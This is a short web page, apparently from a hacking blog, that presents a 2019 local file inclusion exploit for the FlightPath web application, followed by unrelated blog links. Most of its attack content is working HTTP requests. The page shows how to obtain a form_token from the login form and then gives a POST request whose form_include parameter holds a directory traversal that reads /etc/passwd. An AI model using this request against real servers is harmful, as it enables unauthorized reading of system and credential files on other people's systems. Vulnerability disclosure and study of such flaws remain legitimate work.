Local File Inclusion – FlightPath

New Vulnerability 2019 LFI

# Parameters : include_form

# POST Method:

Steps:

use the login form to get right form_token [ you can use wrong user/pass ]

This is how to POST looks like:

POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1

callback=system_login_form&form_token=fb7c9d22c839e3fb5fa93fe383b30c9b&form_type=&form_path=login&form_params=YTowOnt9&form_include=&default_redirect_path=login&default_redirect_query=current_student_id%3D%26advising_student_id%3D¤t_student_id=&user=test&password=test&btn_submit=Login

# modfiy the POST request to be:

POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1 callback=system_login_form&form_token=fb7c9d22c839e3fb5fa93fe383b30c9b&form_include=../../../../../../../../../etc/passwd

Tested on: Kali Linux

Vendor Homepage: http://getflightpath.com

Security & Hacking

Tagged in:

lfi attack, lfi vulnerability, Local File Inclusion - FlightPath

Local File Inclusion – FlightPath

Other stories

WordPress Plugin Like Button Authentication Bypass

Working Cross-Site Request Forgery Attack & How to Prevent

3 ideas to keep you healthy and strong

Far far away, behind the word mountains

Press ESC to close

Local File Inclusion – FlightPath

You might also like

rupeetub.com is scam website

Where To Buy cPanel Shared License

21 things you can do with XSS

Other stories

WordPress Plugin Like Button Authentication Bypass

Working Cross-Site Request Forgery Attack & How to Prevent